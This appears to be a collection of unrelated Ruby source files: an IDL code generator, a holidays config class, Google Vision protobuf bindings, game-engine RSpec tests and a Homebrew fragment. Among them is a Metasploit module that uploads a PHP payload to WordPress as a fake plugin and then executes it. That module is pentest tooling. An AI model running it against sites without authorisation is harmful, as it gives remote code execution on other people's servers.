    self.disable_scope_tracking = false
  end
  # Preprocessor-style guard macro emitted around the generated IDL.
  attr_accessor :include_guard
end
class LemComponentScanner < Cxx11::CxxCodeWriterBase
attr_accessor :has_component, :has_connector
def initialize(output = STDOUT, opts = {})
super
self.disable_scope_tracking = true
end
def enter_component(node)
@has_component ||= true
detect_lem_includes(node)
end
def enter_connector(node)
@has_connector ||= true
detect_lem_includes(node)
end
def visit_include(node)
node.all_lem_includes.each do |lem_inc|
add_lem_include(lem_inc)
end
end
def lem_includes
@lem_includes ||= []
end
private
def add_lem_include(lem_inc)
# add LEM include; prevent duplicates
lem_includes << lem_inc unless lem_includes.include?(lem_inc)
end
def detect_lem_includes(comp)
# When the component is derived from another we need to
# find the lem stub where the base component is defined in
if comp.base
detect_included_interface(comp.base)
end
comp.ports.each do |port|
# For an interface used as facet we need to
# included the interface LEM include, for a
# receptacle the IDL file defining the interface
# is already included in the component/connector IDL
if port.porttype == :facet
# see if interface declared in include file
# get port interface node
intf = port.idltype.resolved_type.node
detect_included_interface(intf)
end
end
end
def detect_included_interface(node)
# see if interface node is leaf of Include node
while node.enclosure
if IDL::AST::Include === node.enclosure
# included interface needs LEM include
add_lem_include(node.enclosure.filename.sub(/\.idl\Z/i, 'E.idl'))
break
end
node = node.enclosure
end
end
end
# Writer that emits the LEM (Local Executor Mapping) IDL for a parsed IDL
# file: executor declarations for interfaces, components and connectors,
# plus includes of the LEM IDL of any base/facet interfaces defined in
# other files (collected by LemComponentScanner in the pre-visit pass).
class LemExecutorIDLWriter < LemExecutorIDLWriterBase
  helper_method :has_component?, :has_connector?, :has_lem_includes?, :lem_includes
  helper Cxx11::IncludeGuardHelper

  def initialize(output = STDOUT, opts = {})
    super
    @include_guard = "__RIDL_#{File.basename(params[:lem_output_file] || '').to_random_include_guard}_INCLUDED__"
    # Original IDL file to re-include from the generated LEM IDL; prefer the
    # pre-stripped name when the front-end provides one. (Original spelled
    # this as an explicit `!= nil` branch; `||` is equivalent here since the
    # parameter is a filename string or nil, never false.)
    properties[:org_idl_include] =
      params[:stripped_filename] ||
      File.basename(params[:idlfile], params[:idlext]) + params[:idlext]
  end

  # True when the scanned file declares a component or connector.
  def has_component?
    @has_component || @has_connector
  end

  def has_connector?
    @has_connector
  end

  # LEM include files collected by the pre-visit scan.
  def lem_includes
    @lem_includes ||= []
  end

  def has_lem_includes?
    !lem_includes.empty?
  end

  # First pass: scan the AST for components/connectors and the LEM includes
  # they require, then emit the file preamble.
  def pre_visit(parser)
    writer(LemComponentScanner) do |w|
      w.visit_nodes(parser)
      # normalize the scanner's nil/true flags to real booleans
      @has_component = w.has_component ? true : false
      @has_connector = w.has_connector ? true : false
      @lem_includes = w.lem_includes
    end
    visitor(PreVisitor).visit
  end

  def post_visit(parser)
    visitor(PostVisitor).visit
  end

  # Emit an executor declaration unless the interface is abstract or is
  # explicitly annotated with @lem(false).
  def enter_interface(node)
    return if node.is_abstract?
    annot = node.annotations[:"lem"]
    # `== false` already implies the value is non-nil, so only the
    # annotation's presence needs an explicit check (the original compared
    # all three against nil).
    return if annot[0] && annot[0].fields[:value] == false
    visitor(InterfaceVisitor).visit_lem(node)
  end

  def enter_component(node)
    visitor(ComponentVisitor).visit_lem(node)
  end

  def enter_connector(node)
    visitor(ConnectorVisitor).visit_lem(node)
  end

  # True when the module (transitively) contains an interface, a
  # component/connector or a home, i.e. anything that produces LEM output.
  def module_needs_lem_code?(modnode)
    modnode.match_members do |c|
      case c
      when IDL::AST::Interface, IDL::AST::ComponentBase, IDL::AST::Home
        true
      when IDL::AST::Module
        module_needs_lem_code?(c)
      else
        false
      end
    end
  end

  def enter_module(node)
    super
    if module_needs_lem_code?(node)
      println
      printiln('// generated from LemExecutorIDLWriter#enter_module')
      printiln('module ' + node.unescaped_name)
      printiln('{')
      inc_nest
    end
  end

  def leave_module(node)
    # NOTE(review): `super` is only invoked when the module produced LEM
    # output, whereas enter_module calls `super` unconditionally — verify
    # this asymmetry is intentional for the base class's scope tracking.
    if module_needs_lem_code?(node)
      dec_nest
      println
      printiln("}; // module #{node.unescaped_name}")
      super
    end
  end
end # LemExecutorIDLWriter
module LemExecutor
  # Default writer used for LEM executor IDL generation.
  IDLWriter = LemExecutorIDLWriter
  # Allows backends to substitute their own writer implementation for the
  # default; replaces the IDLWriter constant in place.
  def self.set_idl_writer(klass)
    remove_const(:IDLWriter) if const_defined?(:IDLWriter)
    const_set(:IDLWriter, klass)
  end
end
end # CCMX11
end # module IDL
| 27.805 | 117 | 0.598993 |
bfd462099b0bc9f2ee924f527ec42162737d26f5 | 450 | module HolidaysFromGoogleCalendar
# Holds user-tunable settings: target calendar, API credential, cache
# behaviour and preloading. `credential` has no default and stays nil until
# assigned by the user.
class Configuration
  # Upper bound on cached entries when the caller does not override it.
  DEFAULT_CACHE_SIZE = 1_000
  attr_accessor :calendar, :credential, :cache, :preload
  def initialize
    @calendar = {
      nation: "japanese",
      language: "en"
    }
    @cache = {
      enable: true,
      max_size: DEFAULT_CACHE_SIZE
    }
    @preload = {
      enable: true, # Require cache enabled
      date_range: 1.year # NOTE(review): `1.year` requires ActiveSupport — confirm it is loaded
    }
  end
end
end
| 18 | 58 | 0.582222 |
1ab30f176fec5283c0d946aa280756deaf5af79a | 3,058 | ##
# This module requires Metasploit: http://www.metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'rex/zip'
# WordPress authenticated shell upload: logs in with admin credentials,
# packs the payload into a minimal WordPress plugin zip, uploads it through
# the plugin installer, then requests the dropped PHP file to execute it.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking
  include Msf::Exploit::FileDropper
  include Msf::Exploit::Remote::HTTP::Wordpress
  def initialize(info = {})
    super(update_info(
      info,
      'Name' => 'WordPress Admin Shell Upload',
      'Description' => %q{
        This module will generate a plugin, pack the payload into it
        and upload it to a server running WordPress providing valid
        admin credentials are used.
      },
      'License' => MSF_LICENSE,
      'Author' =>
        [
          'Rob Carr <rob[at]rastating.com>' # Metasploit module
        ],
      'DisclosureDate' => 'Feb 21 2015',
      'Platform' => 'php',
      'Arch' => ARCH_PHP,
      'Targets' => [['WordPress', {}]],
      'DefaultTarget' => 0
    ))
    register_options(
      [
        OptString.new('USERNAME', [true, 'The WordPress username to authenticate with']),
        OptString.new('PASSWORD', [true, 'The WordPress password to authenticate with'])
      ], self.class)
  end
  # Convenience accessor for the USERNAME datastore option.
  def username
    datastore['USERNAME']
  end
  # Convenience accessor for the PASSWORD datastore option.
  def password
    datastore['PASSWORD']
  end
  # Builds an in-memory (uncompressed) zip archive that WordPress accepts as
  # a plugin: a stub plugin-header PHP file plus a second PHP file carrying
  # the encoded payload.
  def generate_plugin(plugin_name, payload_name)
    plugin_script = %Q{<?php
/**
 * Plugin Name: #{plugin_name}
 * Version: #{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(1)}.#{Rex::Text.rand_text_numeric(2)}
 * Author: #{Rex::Text.rand_text_alpha(10)}
 * Author URI: http://#{Rex::Text.rand_text_alpha(10)}.com
 * License: GPL2
 */
?>}
    zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
    zip.add_file("#{plugin_name}/#{plugin_name}.php", plugin_script)
    zip.add_file("#{plugin_name}/#{payload_name}.php", payload.encoded)
    zip
  end
  # Exploit flow: verify the target runs WordPress, authenticate, upload the
  # generated plugin, register the dropped files for cleanup, and GET the
  # payload URI (short 5-second timeout) to trigger execution.
  def exploit
    fail_with(Failure::NotFound, 'The target does not appear to be using WordPress') unless wordpress_and_online?
    print_status("Authenticating with WordPress using #{username}:#{password}...")
    cookie = wordpress_login(username, password)
    fail_with(Failure::NoAccess, 'Failed to authenticate with WordPress') if cookie.nil?
    print_good("Authenticated with WordPress")
    print_status("Preparing payload...")
    plugin_name = Rex::Text.rand_text_alpha(10)
    payload_name = "#{Rex::Text.rand_text_alpha(10)}"
    payload_uri = normalize_uri(wordpress_url_plugins, plugin_name, "#{payload_name}.php")
    zip = generate_plugin(plugin_name, payload_name)
    print_status("Uploading payload...")
    uploaded = wordpress_upload_plugin(plugin_name, zip.pack, cookie)
    fail_with(Failure::UnexpectedReply, 'Failed to upload the payload') unless uploaded
    print_status("Executing the payload at #{payload_uri}...")
    register_files_for_cleanup("#{payload_name}.php")
    register_files_for_cleanup("#{plugin_name}.php")
    send_request_cgi({ 'uri' => payload_uri, 'method' => 'GET' }, 5)
  end
end
| 33.23913 | 113 | 0.660889 |
1879b868be1d402d612883e1e4673f1389d6aa96 | 10,029 | # Generated by the protocol buffer compiler. DO NOT EDIT!
# source: google/cloud/vision/v1/image_annotator.proto
require 'google/protobuf'
require 'google/api/annotations_pb'
require 'google/cloud/vision/v1/geometry_pb'
require 'google/rpc/status_pb'
require 'google/type/color_pb'
require 'google/type/latlng_pb'
Google::Protobuf::DescriptorPool.generated_pool.build do
add_message "google.cloud.vision.v1.Feature" do
optional :type, :enum, 1, "google.cloud.vision.v1.Feature.Type"
optional :max_results, :int32, 2
end
add_enum "google.cloud.vision.v1.Feature.Type" do
value :TYPE_UNSPECIFIED, 0
value :FACE_DETECTION, 1
value :LANDMARK_DETECTION, 2
value :LOGO_DETECTION, 3
value :LABEL_DETECTION, 4
value :TEXT_DETECTION, 5
value :SAFE_SEARCH_DETECTION, 6
value :IMAGE_PROPERTIES, 7
end
add_message "google.cloud.vision.v1.ImageSource" do
optional :gcs_image_uri, :string, 1
end
add_message "google.cloud.vision.v1.Image" do
optional :content, :bytes, 1
optional :source, :message, 2, "google.cloud.vision.v1.ImageSource"
end
add_message "google.cloud.vision.v1.FaceAnnotation" do
optional :bounding_poly, :message, 1, "google.cloud.vision.v1.BoundingPoly"
optional :fd_bounding_poly, :message, 2, "google.cloud.vision.v1.BoundingPoly"
repeated :landmarks, :message, 3, "google.cloud.vision.v1.FaceAnnotation.Landmark"
optional :roll_angle, :float, 4
optional :pan_angle, :float, 5
optional :tilt_angle, :float, 6
optional :detection_confidence, :float, 7
optional :landmarking_confidence, :float, 8
optional :joy_likelihood, :enum, 9, "google.cloud.vision.v1.Likelihood"
optional :sorrow_likelihood, :enum, 10, "google.cloud.vision.v1.Likelihood"
optional :anger_likelihood, :enum, 11, "google.cloud.vision.v1.Likelihood"
optional :surprise_likelihood, :enum, 12, "google.cloud.vision.v1.Likelihood"
optional :under_exposed_likelihood, :enum, 13, "google.cloud.vision.v1.Likelihood"
optional :blurred_likelihood, :enum, 14, "google.cloud.vision.v1.Likelihood"
optional :headwear_likelihood, :enum, 15, "google.cloud.vision.v1.Likelihood"
end
add_message "google.cloud.vision.v1.FaceAnnotation.Landmark" do
optional :type, :enum, 3, "google.cloud.vision.v1.FaceAnnotation.Landmark.Type"
optional :position, :message, 4, "google.cloud.vision.v1.Position"
end
add_enum "google.cloud.vision.v1.FaceAnnotation.Landmark.Type" do
value :UNKNOWN_LANDMARK, 0
value :LEFT_EYE, 1
value :RIGHT_EYE, 2
value :LEFT_OF_LEFT_EYEBROW, 3
value :RIGHT_OF_LEFT_EYEBROW, 4
value :LEFT_OF_RIGHT_EYEBROW, 5
value :RIGHT_OF_RIGHT_EYEBROW, 6
value :MIDPOINT_BETWEEN_EYES, 7
value :NOSE_TIP, 8
value :UPPER_LIP, 9
value :LOWER_LIP, 10
value :MOUTH_LEFT, 11
value :MOUTH_RIGHT, 12
value :MOUTH_CENTER, 13
value :NOSE_BOTTOM_RIGHT, 14
value :NOSE_BOTTOM_LEFT, 15
value :NOSE_BOTTOM_CENTER, 16
value :LEFT_EYE_TOP_BOUNDARY, 17
value :LEFT_EYE_RIGHT_CORNER, 18
value :LEFT_EYE_BOTTOM_BOUNDARY, 19
value :LEFT_EYE_LEFT_CORNER, 20
value :RIGHT_EYE_TOP_BOUNDARY, 21
value :RIGHT_EYE_RIGHT_CORNER, 22
value :RIGHT_EYE_BOTTOM_BOUNDARY, 23
value :RIGHT_EYE_LEFT_CORNER, 24
value :LEFT_EYEBROW_UPPER_MIDPOINT, 25
value :RIGHT_EYEBROW_UPPER_MIDPOINT, 26
value :LEFT_EAR_TRAGION, 27
value :RIGHT_EAR_TRAGION, 28
value :LEFT_EYE_PUPIL, 29
value :RIGHT_EYE_PUPIL, 30
value :FOREHEAD_GLABELLA, 31
value :CHIN_GNATHION, 32
value :CHIN_LEFT_GONION, 33
value :CHIN_RIGHT_GONION, 34
end
add_message "google.cloud.vision.v1.LocationInfo" do
optional :lat_lng, :message, 1, "google.type.LatLng"
end
add_message "google.cloud.vision.v1.Property" do
optional :name, :string, 1
optional :value, :string, 2
end
add_message "google.cloud.vision.v1.EntityAnnotation" do
optional :mid, :string, 1
optional :locale, :string, 2
optional :description, :string, 3
optional :score, :float, 4
optional :confidence, :float, 5
optional :topicality, :float, 6
optional :bounding_poly, :message, 7, "google.cloud.vision.v1.BoundingPoly"
repeated :locations, :message, 8, "google.cloud.vision.v1.LocationInfo"
repeated :properties, :message, 9, "google.cloud.vision.v1.Property"
end
add_message "google.cloud.vision.v1.SafeSearchAnnotation" do
optional :adult, :enum, 1, "google.cloud.vision.v1.Likelihood"
optional :spoof, :enum, 2, "google.cloud.vision.v1.Likelihood"
optional :medical, :enum, 3, "google.cloud.vision.v1.Likelihood"
optional :violence, :enum, 4, "google.cloud.vision.v1.Likelihood"
end
add_message "google.cloud.vision.v1.LatLongRect" do
optional :min_lat_lng, :message, 1, "google.type.LatLng"
optional :max_lat_lng, :message, 2, "google.type.LatLng"
end
add_message "google.cloud.vision.v1.ColorInfo" do
optional :color, :message, 1, "google.type.Color"
optional :score, :float, 2
optional :pixel_fraction, :float, 3
end
add_message "google.cloud.vision.v1.DominantColorsAnnotation" do
repeated :colors, :message, 1, "google.cloud.vision.v1.ColorInfo"
end
add_message "google.cloud.vision.v1.ImageProperties" do
optional :dominant_colors, :message, 1, "google.cloud.vision.v1.DominantColorsAnnotation"
end
add_message "google.cloud.vision.v1.ImageContext" do
optional :lat_long_rect, :message, 1, "google.cloud.vision.v1.LatLongRect"
repeated :language_hints, :string, 2
end
add_message "google.cloud.vision.v1.AnnotateImageRequest" do
optional :image, :message, 1, "google.cloud.vision.v1.Image"
repeated :features, :message, 2, "google.cloud.vision.v1.Feature"
optional :image_context, :message, 3, "google.cloud.vision.v1.ImageContext"
end
add_message "google.cloud.vision.v1.AnnotateImageResponse" do
repeated :face_annotations, :message, 1, "google.cloud.vision.v1.FaceAnnotation"
repeated :landmark_annotations, :message, 2, "google.cloud.vision.v1.EntityAnnotation"
repeated :logo_annotations, :message, 3, "google.cloud.vision.v1.EntityAnnotation"
repeated :label_annotations, :message, 4, "google.cloud.vision.v1.EntityAnnotation"
repeated :text_annotations, :message, 5, "google.cloud.vision.v1.EntityAnnotation"
optional :safe_search_annotation, :message, 6, "google.cloud.vision.v1.SafeSearchAnnotation"
optional :image_properties_annotation, :message, 8, "google.cloud.vision.v1.ImageProperties"
optional :error, :message, 9, "google.rpc.Status"
end
add_message "google.cloud.vision.v1.BatchAnnotateImagesRequest" do
repeated :requests, :message, 1, "google.cloud.vision.v1.AnnotateImageRequest"
end
add_message "google.cloud.vision.v1.BatchAnnotateImagesResponse" do
repeated :responses, :message, 1, "google.cloud.vision.v1.AnnotateImageResponse"
end
add_enum "google.cloud.vision.v1.Likelihood" do
value :UNKNOWN, 0
value :VERY_UNLIKELY, 1
value :UNLIKELY, 2
value :POSSIBLE, 3
value :LIKELY, 4
value :VERY_LIKELY, 5
end
end
module Google
module Cloud
module Vision
module V1
Feature = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1.Feature").msgclass
Feature::Type = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1.Feature.Type").enummodule
ImageSource = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1.ImageSource").msgclass
Image = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1.Image").msgclass
FaceAnnotation = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1.FaceAnnotation").msgclass
FaceAnnotation::Landmark = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1.FaceAnnotation.Landmark").msgclass
FaceAnnotation::Landmark::Type = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1.FaceAnnotation.Landmark.Type").enummodule
LocationInfo = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1.LocationInfo").msgclass
Property = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1.Property").msgclass
EntityAnnotation = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1.EntityAnnotation").msgclass
SafeSearchAnnotation = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1.SafeSearchAnnotation").msgclass
LatLongRect = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1.LatLongRect").msgclass
ColorInfo = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1.ColorInfo").msgclass
DominantColorsAnnotation = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1.DominantColorsAnnotation").msgclass
ImageProperties = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1.ImageProperties").msgclass
ImageContext = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1.ImageContext").msgclass
AnnotateImageRequest = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1.AnnotateImageRequest").msgclass
AnnotateImageResponse = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1.AnnotateImageResponse").msgclass
BatchAnnotateImagesRequest = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1.BatchAnnotateImagesRequest").msgclass
BatchAnnotateImagesResponse = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1.BatchAnnotateImagesResponse").msgclass
Likelihood = Google::Protobuf::DescriptorPool.generated_pool.lookup("google.cloud.vision.v1.Likelihood").enummodule
end
end
end
end
| 51.695876 | 161 | 0.753814 |
f822d38ce353d6880298f5e11734663dbc35f628 | 14,018 | # typed: false
# Integration-style specs for AttackAction: attack resolution, weapon choice,
# advantage/disadvantage computation, resistances/vulnerabilities, cover and
# fighting-style interactions. Several examples seed the RNG (srand) so that
# rolls are reproducible; do not reorder setup without re-checking expectations.
RSpec.describe AttackAction do
  let(:session) { Natural20::Session.new }
  context do
    before do
      srand(1000)
      @battle_map = Natural20::BattleMap.new(session, 'fixtures/battle_sim')
      @battle = Natural20::Battle.new(session, @battle_map)
      @character = Natural20::PlayerCharacter.load(session, File.join('fixtures', 'high_elf_fighter.yml'))
      @npc = session.npc(:ogre)
      @npc2 = session.npc(:goblin)
    end
    context 'attack test' do
      before do
        String.disable_colorization true
        @battle.add(@character, :a, position: :spawn_point_1, token: 'G')
        @battle.add(@npc, :b, position: :spawn_point_2, token: 'g')
        @character.reset_turn!(@battle)
        @npc.reset_turn!(@battle)
      end
      # Walks the action-builder continuation chain, answering each prompt
      # until no parameters remain.
      it 'auto build' do
        cont = AttackAction.build(session, @character)
        loop do
          param = cont.param&.map do |p|
            case (p[:type])
            when :select_target
              @npc
            when :select_weapon
              'vicious_rapier'
            else
              # NOTE(review): this reads p.type while the case above reads
              # p[:type] — confirm which accessor the param object supports.
              raise "unknown #{p.type}"
            end
          end
          cont = cont.next.call(*param)
          break if param.nil?
        end
        expect(cont.target).to eq(@npc)
        expect(cont.source).to eq(@character)
        expect(cont.using).to eq('vicious_rapier')
      end
      context 'two weapon fighting' do
        before do
          @character = Natural20::PlayerCharacter.load(session, File.join('fixtures', 'elf_rogue.yml'),
                                                       { equipped: %w[dagger dagger] })
          @npc = session.npc(:goblin)
          @battle.add(@character, :a, token: 'R', position: [0, 0])
          @battle.add(@npc, :b, token: 'g', position: [1, 0])
          @character.reset_turn!(@battle)
          @npc.reset_turn!(@battle)
        end
        it 'allows for two weapon fighting' do
          puts Natural20::MapRenderer.new(@battle_map).render
          expect(@character.available_actions(session, @battle).map(&:action_type)).to include(:attack)
          expect(@character.equipped_items.map(&:label)).to eq(%w[Dagger Dagger])
          action = AttackAction.build(session, @character).next.call(@npc).next.call('dagger').next.call
          @battle.action!(action)
          @battle.commit(action)
          # A second attack must still be available via the off-hand weapon.
          expect(@character.available_actions(session, @battle).map(&:action_type)).to include(:attack)
        end
      end
      specify 'unarmed attack' do
        Natural20::EventManager.standard_cli
        @battle_map.move_to!(@character, 0, 5, @battle)
        srand(1000)
        puts Natural20::MapRenderer.new(@battle_map).render
        action = AttackAction.build(session, @character).next.call(@npc).next.call('unarmed_attack').next.call
        expect do
          @battle.action!(action)
          @battle.commit(action)
        end.to change(@npc, :hp).from(59).to(57)
      end
      context 'versatile weapon' do
        # Versatile weapons roll a larger die when wielded two-handed
        # (i.e. once the off-hand item is unequipped).
        it 'one handed attack' do
          @character.unequip(:longbow)
          expect(@character.equipped_items.map(&:name).sort).to eq(%i[shield studded_leather vicious_rapier])
          action = AttackAction.build(session, @character).next.call(@npc).next.call('spear').next.call
          action.resolve(session, @battle_map, battle: @battle)
          expect(action.result.first[:damage_roll]).to eq('1d6+3')
          @character.unequip(:vicious_rapier)
          action.resolve(session, @battle_map, battle: @battle)
          expect(action.result.first[:damage_roll]).to eq('1d8+3')
        end
      end
      specify 'range disadvantage' do
        @battle.add(@npc2, :b, position: [3, 3], token: 'O')
        @npc2.reset_turn!(@battle)
        Natural20::EventManager.standard_cli
        action = AttackAction.build(session, @character).next.call(@npc).next.call('longbow').next.call
        expect do
          @battle.action!(action)
          @battle.commit(action)
        end.to change(@npc, :hp).from(59).to(52)
      end
    end
    context 'resistances and vulnerabilities' do
      before do
        Natural20::EventManager.standard_cli
        @npc = session.npc(:skeleton, overrides: { max_hp: 100 })
        @battle.add(@npc, :b, position: [1, 0])
        @battle.add(@character, :a, position: [2, 0])
      end
      context 'handle resistances and vulnerabilites' do
        specify 'attack with normal weapon' do
          srand(1000)
          expect do
            puts Natural20::MapRenderer.new(@battle_map, @battle).render
            @action = AttackAction.build(session, @character).next.call(@npc).next.call('dagger').next.call
            @action.resolve(session, @battle_map, battle: @battle)
            @battle.commit(@action)
          end.to change(@npc, :hp).from(100).to(87)
        end
        # Skeletons are vulnerable to bludgeoning, so the hammer hits harder
        # than the dagger under the same seed.
        specify 'attack with vulnerable weapon' do
          srand(1000)
          expect do
            puts Natural20::MapRenderer.new(@battle_map, @battle).render
            @action = AttackAction.build(session, @character).next.call(@npc).next.call('light_hammer').next.call
            @action.resolve(session, @battle_map, battle: @battle)
            @battle.commit(@action)
          end.to change(@npc, :hp).from(100).to(82)
        end
      end
    end
    context 'unseen attacker' do
      before do
        @battle.add(@character, :a, position: :spawn_point_3, token: 'G')
        @character.reset_turn!(@battle)
        @guard = @battle_map.entity_at(5, 5)
        @action = AttackAction.build(session, @character).next.call(@guard).next.call('longbow').next.call
        srand(2000)
      end
      context 'attack from the dark' do
        specify '#compute_advantages_and_disadvantages' do
          puts Natural20::MapRenderer.new(@battle_map).render(line_of_sight: @guard)
          weapon = session.load_weapon('longbow')
          expect(@action.compute_advantages_and_disadvantages(@battle, @character, @guard,
                                                              weapon)).to eq([[:unseen_attacker], []])
        end
        it 'computes advantage' do
          Natural20::EventManager.standard_cli
          expect do
            @battle.action!(@action)
            @battle.commit(@action)
          end.to change { @guard.hp }.from(10).to(0)
        end
      end
      context 'when target is prone' do
        before do
          @battle_map.move_to!(@character, 2, 3, @battle)
          @guard.prone!
        end
        context 'ranged weapon' do
          let(:weapon) { session.load_weapon('longbow') }
          specify 'has range disadvantage' do
            expect(@action.compute_advantages_and_disadvantages(@battle, @character, @guard,
                                                                weapon)).to eq([[], [:target_is_prone_range]])
          end
        end
        context 'melee attack' do
          let(:weapon) { session.load_weapon('rapier') }
          specify 'has melee advantage' do
            expect(@action.compute_advantages_and_disadvantages(@battle, @character, @guard,
                                                                weapon)).to eq([[:target_is_prone], []])
          end
        end
      end
      context 'when attacker is prone' do
        before do
          @battle_map.move_to!(@character, 2, 3, @battle)
          @character.prone!
        end
        context 'ranged weapon' do
          let(:weapon) { session.load_weapon('longbow') }
          specify 'has range disadvantage' do
            expect(@action.compute_advantages_and_disadvantages(@battle, @character, @guard,
                                                                weapon)).to eq([[], [:prone]])
          end
        end
        context 'melee attack' do
          let(:weapon) { session.load_weapon('rapier') }
          specify 'has melee disadvantage' do
            expect(@action.compute_advantages_and_disadvantages(@battle, @character, @guard,
                                                                weapon)).to eq([[], [:prone]])
          end
        end
      end
      context 'attack while hiding' do
        let(:weapon) { session.load_weapon('longbow') }
        before do
          @battle_map.move_to!(@character, 2, 3, @battle)
          @character.hiding!(@battle, 20)
        end
        specify '#compute_advantages_and_disadvantages' do
          puts Natural20::MapRenderer.new(@battle_map).render(line_of_sight: @guard)
          expect(@action.compute_advantages_and_disadvantages(@battle, @character, @guard,
                                                              weapon)).to eq([[:unseen_attacker], []])
        end
        # A stealth roll of 8 is beaten by the guard, so no advantage.
        context 'bad at hiding' do
          before do
            @character.hiding!(@battle, 8)
          end
          specify '#compute_advantages_and_disadvantages' do
            puts Natural20::MapRenderer.new(@battle_map).render(line_of_sight: @guard)
            expect(@action.compute_advantages_and_disadvantages(@battle, @character, @guard,
                                                                weapon)).to eq([[], []])
          end
        end
        context 'Naturally Stealthy' do
          before do
            @character2 = Natural20::PlayerCharacter.load(session, File.join('fixtures', 'halfling_rogue.yml'))
            @battle.add(@character2, :a, position: [1, 3])
            @battle_map.move_to!(@guard, 4, 3, @battle)
            @character2.hiding!(@battle, 20)
          end
          specify do
            expect(@character2.class_feature?('naturally_stealthy')).to be
          end
          specify '#compute_advantages_and_disadvantages' do
            puts Natural20::MapRenderer.new(@battle_map).render(line_of_sight: @guard)
            expect(@action.compute_advantages_and_disadvantages(@battle, @character2, @guard,
                                                                weapon)).to eq([[:unseen_attacker], []])
          end
        end
      end
      context 'pack_tactics' do
        before do
          @npc = session.npc(:wolf)
          @npc2 = session.npc(:wolf)
          @battle_map.move_to!(@character, 0, 5, @battle)
          @battle.add(@npc, :b, position: [1, 5])
          @battle.add(@npc2, :b, position: [0, 6])
        end
        specify '#compute_advantages_and_disadvantages' do
          puts Natural20::MapRenderer.new(@battle_map).render
          expect(@action.compute_advantages_and_disadvantages(@battle, @npc, @character,
                                                              @npc.npc_actions.first)).to eq([[:pack_tactics], []])
        end
        specify 'no pack tactics if no ally' do
          @battle_map.move_to!(@npc2, 2, 5, @battle)
          puts Natural20::MapRenderer.new(@battle_map).render
          expect(@action.compute_advantages_and_disadvantages(@battle, @npc, @character,
                                                              @npc.npc_actions.first)).to eq([[], []])
        end
      end
    end
    context 'attacking an unseen or invisible target' do
      before do
        Natural20::EventManager.standard_cli
        @character = Natural20::PlayerCharacter.load(session, File.join('fixtures', 'human_fighter.yml'))
        @goblin = session.npc(:goblin)
        @battle.add(@character, :a, position: [5, 0])
        @battle_map.place(5, 1, @goblin)
        @action = AttackAction.build(session, @character).next.call(@goblin).next.call('dagger').next.call
      end
      specify 'has disadvantage' do
        puts Natural20::MapRenderer.new(@battle_map).render
        expect(@action.compute_advantages_and_disadvantages(@battle, @character, @goblin,
                                                            'dagger')).to eq([[], [:invisible_attacker]])
      end
      specify 'can attack invisible' do
        @battle.action!(@action)
        @battle.commit(@action)
        expect(@action.result.last[:attack_roll].roller.disadvantage).to be
      end
    end
    context 'protection fighting style' do
      before do
        @npc = session.npc(:wolf)
        @character = Natural20::PlayerCharacter.load(session, File.join('fixtures', 'high_elf_fighter.yml'),
                                                     { class_features: ['protection'] })
        @character2 = Natural20::PlayerCharacter.load(session, File.join('fixtures', 'halfling_rogue.yml'))
        @battle.add(@character, :a, position: [0, 5])
        @battle.add(@character2, :a, position: [1, 5])
        @battle.add(@npc, :b, position: [1, 6])
        @character.reset_turn!(@battle)
        Natural20::EventManager.standard_cli
      end
      # Protection lets a shield-bearer spend a reaction to impose
      # disadvantage on an attack against an adjacent ally.
      specify 'able to impose disadvantage on attack roll' do
        puts Natural20::MapRenderer.new(@battle_map).render
        expect(@character.class_feature?('protection')).to be
        expect(@character.shield_equipped?).to be
        action = AttackAction.build(session, @npc).next.call(@character2).next.call('Bite').next.call
        @battle.action!(action)
        @battle.commit(action)
        expect(action.advantage_mod).to eq(-1)
        expect(@character.total_reactions(@battle)).to eq(0)
      end
    end
  end
  context '#calculate_cover_ac' do
    before do
      @battle_map = Natural20::BattleMap.new(session, 'fixtures/battle_sim_objects')
      @map_renderer = Natural20::MapRenderer.new(@battle_map)
      @character = Natural20::PlayerCharacter.load(session, File.join('fixtures', 'high_elf_fighter.yml'))
      @npc2 = session.npc(:goblin)
      @battle_map.place(1, 2, @character, 'G')
      @battle_map.place(5, 2, @npc2, 'g')
      @action = AttackAction.build(session, @character).next.call(@npc2).next.call('longbow').next.call
      @action2 = AttackAction.build(session, @npc2).next.call(@character).next.call('longbow').next.call
    end
    it 'adjusts AC based on cover characteristics' do
      expect(@action.calculate_cover_ac(@battle_map, @npc2)).to eq 0
      expect(@action2.calculate_cover_ac(@battle_map, @character)).to eq 2
    end
  end
end
| 40.514451 | 115 | 0.582323 |
d583d72b5f4df4bb305aecb820eda03af8f786db | 3,024 | require "diagnostic"
require "fileutils"
require "hardware"
require "development_tools"
module Homebrew
  # Pre-install sanity checks plus the Linux-only compatibility symlinks
  # (dynamic linker and host GCC) that Homebrew sets up before installing.
  module Install
    module_function

    # Abort immediately on PowerPC hardware, which Homebrew does not support.
    def check_ppc
      return unless Hardware::CPU.type == :ppc

      abort <<~EOS
        Sorry, Homebrew does not support your computer's CPU architecture.
